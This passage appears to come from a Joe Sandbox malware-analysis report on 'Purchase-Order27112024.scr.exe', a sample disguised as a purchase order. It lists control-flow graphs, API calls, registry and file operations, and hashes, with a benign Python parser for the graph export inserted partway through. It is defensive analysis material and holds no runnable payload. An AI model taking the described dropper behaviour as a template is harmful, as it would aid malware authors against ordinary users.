                                                                                                      • Instruction ID: 09d17c59ce7287a2cbf3dc662f19c44123261f726eb293d34c68041fb2ac0666
                                                                                                      • Opcode Fuzzy Hash: 241caa620ce1fcc58b3a3595d79cd8debb0f013b3e7c164dabd01d0a25878295
                                                                                                      • Instruction Fuzzy Hash: CA21A131900558BBCB219FA5DD849DFBFB8EF54310F14807AF904B62A0C3798A81CFA8

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 625 402573-402588 call 402b1d 628 4029c7-4029ca 625->628 629 40258e-402595 625->629 630 4029d0-4029d6 628->630 631 402597 629->631 632 40259a-40259d 629->632 631->632 634 4025a3-4025b2 call 405ea8 632->634 635 4026e6-4026ee 632->635 634->635 638 4025b8 634->638 635->628 639 4025be-4025c2 638->639 640 402657-402667 call 405c37 639->640 641 4025c8-4025e3 ReadFile 639->641 640->635 648 402669 640->648 641->635 642 4025e9-4025ee 641->642 642->635 644 4025f4-402602 642->644 646 4026a2-4026ae call 405e8f 644->646 647 402608-40261a MultiByteToWideChar 644->647 646->630 647->648 650 40261c-40261f 647->650 651 40266c-40266f 648->651 653 402621-40262c 650->653 651->646 654 402671-402676 651->654 653->651 655 40262e-402653 SetFilePointer MultiByteToWideChar 653->655 656 4026b3-4026b7 654->656 657 402678-40267d 654->657 655->653 660 402655 655->660 658 4026d4-4026e0 SetFilePointer 656->658 659 4026b9-4026bd 656->659 657->656 661 40267f-402692 657->661 658->635 663 4026c5-4026d2 659->663 664 4026bf-4026c3 659->664 660->648 661->635 662 402694-40269a 661->662 662->639 665 4026a0 662->665 663->635 664->658 664->663 665->635
                                                                                                      APIs
                                                                                                      • ReadFile.KERNELBASE(?,?,?,?), ref: 004025DB
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402616
                                                                                                      • SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 00402639
                                                                                                      • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 0040264F
                                                                                                        • Part of subcall function 00405C37: ReadFile.KERNELBASE(00409230,00000000,00000000,00000000,00000000,00413E90,0040BE90,0040330C,00409230,00409230,004031FE,00413E90,00004000,?,00000000,?), ref: 00405C4B
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$ByteCharMultiReadWide$Pointerwsprintf
                                                                                                      • String ID: 9
                                                                                                      • API String ID: 1149667376-2366072709
                                                                                                      • Opcode ID: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                                                                      • Instruction ID: 34008a6f5bb5370994306dbe4266d00811a1d2e87b5126a94146f67fdcf6739f
                                                                                                      • Opcode Fuzzy Hash: 14d7a1a443259207830479a75009ee39c6dacd7ae2e8022bb32dc9fb2f0741b6
                                                                                                      • Instruction Fuzzy Hash: 0E51E771E04209ABDF24DF94DE88AAEB779FF04304F50443BE511B62D0D7B99A42CB69

                                                                                                      Control-flow Graph (block id, address range, calls -> successor blocks)
                                                                                                      • 666 40317d-4031a6 GetTickCount -> 667, 668
                                                                                                      • 667 4032e7-4032ef call 402d1a -> 673
                                                                                                      • 668 4031ac-4031d7 call 40330f, SetFilePointer -> 674
                                                                                                      • 673 4032f1-4032f6
                                                                                                      • 674 4031dc-4031ee -> 675, 676
                                                                                                      • 675 4031f0 -> 676
                                                                                                      • 676 4031f2-403200 call 4032f9 -> 679, 680
                                                                                                      • 679 403206-403212 -> 681
                                                                                                      • 680 4032d9-4032dc -> 673
                                                                                                      • 681 403218-40321e -> 682, 683
                                                                                                      • 682 403220-403226 -> 683, 685
                                                                                                      • 683 403249-403265 call 4063ee -> 689, 690
                                                                                                      • 685 403228-403248 call 402d1a -> 683
                                                                                                      • 689 4032e2 -> 691
                                                                                                      • 690 403267-40326f -> 692, 693
                                                                                                      • 691 4032e4-4032e5 -> 673
                                                                                                      • 692 403271-403287 WriteFile -> 694, 695
                                                                                                      • 693 4032a3-4032a9 -> 689, 696
                                                                                                      • 694 403289-40328d -> 695, 697
                                                                                                      • 695 4032de-4032e0 -> 691
                                                                                                      • 696 4032ab-4032ad -> 689, 698
                                                                                                      • 697 40328f-40329b -> 681, 699
                                                                                                      • 698 4032af-4032c2 -> 674, 700
                                                                                                      • 699 4032a1 -> 698
                                                                                                      • 700 4032c8-4032d7 SetFilePointer -> 667
                                                                                                      APIs
                                                                                                      • GetTickCount.KERNEL32 ref: 00403192
                                                                                                        • Part of subcall function 0040330F: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE7,?), ref: 0040331D
                                                                                                      • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000), ref: 004031C5
                                                                                                      • WriteFile.KERNELBASE(0040BE90,004110A0,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?), ref: 0040327F
                                                                                                      • SetFilePointer.KERNELBASE(00004AF2,00000000,00000000,00413E90,00004000,?,00000000,?,00403095,00000004,00000000,00000000,?,?,?,0040300E), ref: 004032D1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$Pointer$CountTickWrite
                                                                                                      • String ID: rQ
                                                                                                      • API String ID: 2146148272-3946962983
                                                                                                      • Opcode ID: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction ID: 34320a24581f7621071559271f75aff2a33e70c32c739a51ea230fcf3b1a2f41
                                                                                                      • Opcode Fuzzy Hash: 38246e7ae17352d7cedfc7595443620c434811b06811d2a86a618e437c7072d2
                                                                                                      • Instruction Fuzzy Hash: CB418B72504205DFDB109F29EE84AA63BADF74431671441BFE604B22E1C7B96D418BEC

                                                                                                      Control-flow Graph (block id, address range, calls -> successor blocks)
                                                                                                      • 701 402331-402377 call 402c2f, call 402b3a * 2, RegCreateKeyExW -> 708, 709
                                                                                                      • 708 4029c7-4029d6
                                                                                                      • 709 40237d-402385 -> 711, 712
                                                                                                      • 711 402387-402394 call 402b3a, lstrlenW -> 712
                                                                                                      • 712 402398-40239b -> 713, 714
                                                                                                      • 713 4023ab-4023ae -> 718, 719
                                                                                                      • 714 40239d-4023aa call 402b1d -> 713
                                                                                                      • 718 4023b0-4023ba call 403062 -> 719
                                                                                                      • 719 4023bf-4023d3 RegSetValueExW -> 723, 724
                                                                                                      • 723 4023d5 -> 724
                                                                                                      • 724 4023d8-4024b2 RegCloseKey -> 708, 726
                                                                                                      • 726 402793-40279a -> 708
                                                                                                      APIs
                                                                                                      • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236F
                                                                                                      • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl791D.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238F
                                                                                                      • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CB
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AC
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateValuelstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\nsl791D.tmp
                                                                                                      • API String ID: 1356686001-934515040
                                                                                                      • Opcode ID: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                      • Instruction ID: 1c964708cf89b7fac74d07524040b6b2ab84de1cfba919da144199f52892a02b
                                                                                                      • Opcode Fuzzy Hash: 7abd92b05f405a69157af65e26feabc4c7652e6a2ebb012a6e5cdbbd5c9e1c3c
                                                                                                      • Instruction Fuzzy Hash: A51190B1A00108BEEB11EFA4CD89EAFBB7CEB50358F10443AF505B61D1D7B85E409B29

                                                                                                      Control-flow Graph (block id, address range, calls -> successor blocks)
                                                                                                      • 727 4015b9-4015cd call 402b3a, call 405a3e -> 732, 733
                                                                                                      • 732 401614-401617 -> 735, 736
                                                                                                      • 733 4015cf-4015eb call 4059c0, CreateDirectoryW -> 740, 741
                                                                                                      • 735 401646-402197 call 401423 -> 749, 750
                                                                                                      • 736 401619-401638 call 401423, call 405f48, SetCurrentDirectoryW -> 750, 751
                                                                                                      • 740 40160a-401612 -> 732, 733
                                                                                                      • 741 4015ed-4015f8 GetLastError -> 744, 745
                                                                                                      • 744 401607 -> 740
                                                                                                      • 745 4015fa-401605 GetFileAttributesW -> 740, 744
                                                                                                      • 749 402793-40279a -> 750
                                                                                                      • 750 4029c7-4029d6
                                                                                                      • 751 40163e-401641 -> 750
                                                                                                      APIs
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(?,?,00424EF0,?,00405AB2,00424EF0,00424EF0,?,?,76232EE0,004057F0,?,C:\Users\user\AppData\Local\Temp\,76232EE0,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"), ref: 00405A4C
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A51
                                                                                                        • Part of subcall function 00405A3E: CharNextW.USER32(00000000), ref: 00405A69
                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                                                                      • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                                                                      • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\googly\pulsation,?,00000000,000000F0), ref: 00401630
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\googly\pulsation, xrefs: 00401623
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                      • String ID: C:\Users\user\AppData\Local\googly\pulsation
                                                                                                      • API String ID: 3751793516-4003725227
                                                                                                      • Opcode ID: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                                                                      • Instruction ID: 602e027c19ef8137931421d3e2870900c2c1aa36f58208ee64056e3add0ea48c
                                                                                                      • Opcode Fuzzy Hash: 9b673ddbf1d69572a6be76a75328456f52fe096521e7ed3c2b5c74dd951979b8
                                                                                                      • Instruction Fuzzy Hash: 4F11C271904200EBCF206FA0CD449AE7AB4FF14369B34463BF881B62E1D23D49419A6E

                                                                                                      Control-flow Graph (block id, address range, calls -> successor blocks)
                                                                                                      • 754 402b7a-402ba3 RegOpenKeyExW -> 755, 756
                                                                                                      • 755 402ba5-402bb0 -> 757
                                                                                                      • 756 402c0e-402c12
                                                                                                      • 757 402bcb-402bdb RegEnumKeyW -> 758, 759
                                                                                                      • 758 402bb2-402bb5 -> 760, 761
                                                                                                      • 759 402bdd-402bef RegCloseKey, call 4062b2 -> 767, 768
                                                                                                      • 760 402c02-402c05 RegCloseKey -> 765
                                                                                                      • 761 402bb7-402bc9 call 402b7a -> 757, 759
                                                                                                      • 765 402c0b-402c0d -> 756
                                                                                                      • 767 402bf1-402c00 -> 756
                                                                                                      • 768 402c15-402c1b -> 765, 769
                                                                                                      • 769 402c1d-402c2b RegDeleteKeyW -> 765, 770
                                                                                                      • 770 402c2d -> 756
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                                                                      • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$DeleteEnumOpen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1912718029-0
                                                                                                      • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                                                                      • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                                                                      • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                                                                      • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
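Joe Sandbox exports each function's graph as a flat stream of tokens: a block id, its address range (a single address for a one-instruction block), any `call <target>` entries and imported API names for that block, and `a->b` edges. The parser below is an added example, not part of the report. Its input is this report's own export for the routine at 402b7a (RegOpenKeyExW, RegEnumKeyW, RegCloseKey, RegDeleteKeyW), plus the RegCreateKeyExW routine at 402331, copied verbatim. Beyond parsing, it answers two questions a reviewer asks of this graph: block 761 calls 402b7a, the routine's own entry address, so the routine recurses into subkeys; and whether RegDeleteKeyW (block 769) can be reached without first passing RegEnumKeyW (block 757), which it cannot. The token layout is inferred from the listing, not taken from Joe Sandbox documentation.

```python
"""Parse Joe Sandbox's flattened control_flow_graph export and query it.
Added example; the token layout is inferred from this report's listing."""
import re
from collections import deque
from dataclasses import dataclass, field

# A block's address token: "402b7a-402ba3" or a single address "402c2d".
_RANGE_RE = re.compile(r"^[0-9a-f]{4,}(?:-[0-9a-f]{4,})?$")

# Copied verbatim from this report: the routine at 402b7a (registry key
# enumeration and deletion) and the routine at 402331 (RegCreateKeyExW).
REG_DELETE_CFG = (
    "control_flow_graph 754 402b7a-402ba3 RegOpenKeyExW 755 402ba5-402bb0 754->755 "
    "756 402c0e-402c12 754->756 757 402bcb-402bdb RegEnumKeyW 755->757 758 402bb2-402bb5 "
    "757->758 759 402bdd-402bef RegCloseKey call 4062b2 757->759 760 402c02-402c05 RegCloseKey "
    "758->760 761 402bb7-402bc9 call 402b7a 758->761 765 402c0b-402c0d 760->765 761->757 "
    "761->759 767 402bf1-402c00 759->767 768 402c15-402c1b 759->768 765->756 767->756 "
    "768->765 769 402c1d-402c2b RegDeleteKeyW 768->769 769->765 770 402c2d 769->770 770->756")
REG_WRITE_CFG = (
    "control_flow_graph 701 402331-402377 call 402c2f call 402b3a * 2 RegCreateKeyExW "
    "708 4029c7-4029d6 701->708 709 40237d-402385 701->709 711 402387-402394 call 402b3a "
    "lstrlenW 709->711 712 402398-40239b 709->712 711->712 713 4023ab-4023ae 712->713 "
    "714 40239d-4023aa call 402b1d 712->714 718 4023b0-4023ba call 403062 713->718 "
    "719 4023bf-4023d3 RegSetValueExW 713->719 714->713 718->719 723 4023d5 719->723 "
    "724 4023d8-4024b2 RegCloseKey 719->724 723->724 724->708 726 402793-40279a 724->726 726->708")


@dataclass
class Block:
    bid: int
    start: int
    end: int
    calls: list = field(default_factory=list)   # "call 402b7a", "RegEnumKeyW", ...


@dataclass
class Cfg:
    blocks: dict   # block id -> Block, in stream order (the first one is the entry)
    edges: list    # (from_id, to_id)
    succ: dict     # block id -> sorted successor ids

    @property
    def entry(self):
        return next(iter(self.blocks))

    def blocks_calling(self, name):
        """Ids of blocks whose calls mention API `name` or hex call target `name`."""
        return sorted(b.bid for b in self.blocks.values()
                      if any(name in c.split() for c in b.calls))

    def recursive_blocks(self):
        """Blocks that call the routine's own entry address (self-recursion)."""
        return self.blocks_calling(f"{self.blocks[self.entry].start:x}")

    def reachable(self, src, blocked=frozenset()):
        """Ids reachable from `src` without entering any block in `blocked`."""
        seen, todo = set(), deque([src])
        while todo:
            b = todo.popleft()
            if b in seen or b in blocked:
                continue
            seen.add(b)
            todo.extend(self.succ.get(b, ()))
        return seen

    def must_pass_through(self, target, via):
        """True if `target` is reachable from the entry and every path to it
        visits `via` (a cheap stand-in for a dominator check)."""
        if target not in self.reachable(self.entry):
            return False
        return target not in self.reachable(self.entry, blocked={via})

    def listing(self):
        """One readable line per block: id, range, calls, successors."""
        out = []
        for b in self.blocks.values():
            rng = f"{b.start:x}" if b.start == b.end else f"{b.start:x}-{b.end:x}"
            line = f"{b.bid} {rng}" + (" " + ", ".join(b.calls) if b.calls else "")
            if b.bid in self.succ:
                line += " -> " + ", ".join(map(str, self.succ[b.bid]))
            out.append(line)
        return out


def parse_cfg(text):
    toks = text.split()
    if toks and toks[0] == "control_flow_graph":
        toks = toks[1:]
    blocks, edges, cur, i = {}, [], None, 0
    while i < len(toks):
        t = toks[i]
        if "->" in t:                                   # edge "a->b"
            a, b = t.split("->")
            edges.append((int(a), int(b)))
            i += 1
        elif t.isdigit() and i + 1 < len(toks) and _RANGE_RE.match(toks[i + 1]):
            lo, _, hi = toks[i + 1].partition("-")      # new block header
            cur = Block(int(t), int(lo, 16), int(hi or lo, 16))
            blocks[cur.bid] = cur
            i += 2
        elif t == "call":                               # internal call target follows
            cur.calls.append(f"call {toks[i + 1]}")
            i += 2
        elif t == "*":                                  # repeat count, "call X * 2"
            cur.calls[-1] += f" * {toks[i + 1]}"
            i += 2
        else:                                           # imported API name
            cur.calls.append(t)
            i += 1
    succ = {}
    for a, b in edges:
        succ.setdefault(a, []).append(b)
    return Cfg(blocks, edges, {k: sorted(v) for k, v in succ.items()})


if __name__ == "__main__":
    cfg = parse_cfg(REG_DELETE_CFG)
    print("\n".join(cfg.listing()))
    print("recurses from blocks:", cfg.recursive_blocks())
    print("RegDeleteKeyW only after RegEnumKeyW:", cfg.must_pass_through(769, 757))
```

The `must_pass_through` check is deliberately simple: it removes one block and asks whether the target is still reachable, which is enough to confirm that on this graph the delete at block 769 is only reached after the enumeration loop at 757 has run, and that 761 (the self-call) feeds back into 757, as you would expect from a routine that empties subkeys before deleting the parent.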

                                                                                                      Control-flow Graph (block id, address range, calls -> successor blocks)
                                                                                                      • 772 10001759-10001795 call 10001b18 -> 776, 777
                                                                                                      • 776 100018a6-100018a8
                                                                                                      • 777 1000179b-1000179f -> 778, 779
                                                                                                      • 778 100017a1-100017a7 call 10002286 -> 779
                                                                                                      • 779 100017a8-100017b5 call 100022d0 -> 784, 785
                                                                                                      • 784 100017e5-100017ec -> 786, 787
                                                                                                      • 785 100017b7-100017bc -> 788, 789
                                                                                                      • 786 1000180c-10001810 -> 793, 794
                                                                                                      • 787 100017ee-1000180a call 100024a9, call 100015b4, call 10001272, GlobalFree -> 809
                                                                                                      • 788 100017d7-100017da -> 784, 795
                                                                                                      • 789 100017be-100017bf -> 791, 792
                                                                                                      • 791 100017c1-100017c2 -> 797, 798
                                                                                                      • 792 100017c7-100017c8 call 100028a4 -> 804
                                                                                                      • 793 10001812-1000184c call 100015b4, call 100024a9 -> 809
                                                                                                      • 794 1000184e-10001854 call 100024a9 -> 809
                                                                                                      • 795 100017dc-100017dd call 10002b5f -> 807
                                                                                                      • 797 100017c4-100017c5 -> 784, 792
                                                                                                      • 798 100017cf-100017d5 call 10002645 -> 813
                                                                                                      • 804 100017cd -> 807
                                                                                                      • 807 100017e2 -> 813
                                                                                                      • 809 10001855-10001859 -> 814, 815
                                                                                                      • 813 100017e4 -> 784
                                                                                                      • 814 10001896-1000189d -> 776, 820
                                                                                                      • 815 1000185b-10001869 call 1000246c -> 822, 823
                                                                                                      • 820 1000189f-100018a0 GlobalFree -> 776
                                                                                                      • 822 10001881-10001888 -> 814, 825
                                                                                                      • 823 1000186b-1000186e -> 822, 824
                                                                                                      • 824 10001870-10001878 -> 822, 826
                                                                                                      • 825 1000188a-10001895 call 1000153d -> 814
                                                                                                      • 826 1000187a-1000187b FreeLibrary -> 822
                                                                                                      APIs
                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                        • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                      • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                        • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                                                                        • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                        • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                      • String ID:
                                                                                                      • API String ID: 1791698881-3916222277
                                                                                                      • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                      • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                      • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                                                                      • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00401FC3
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
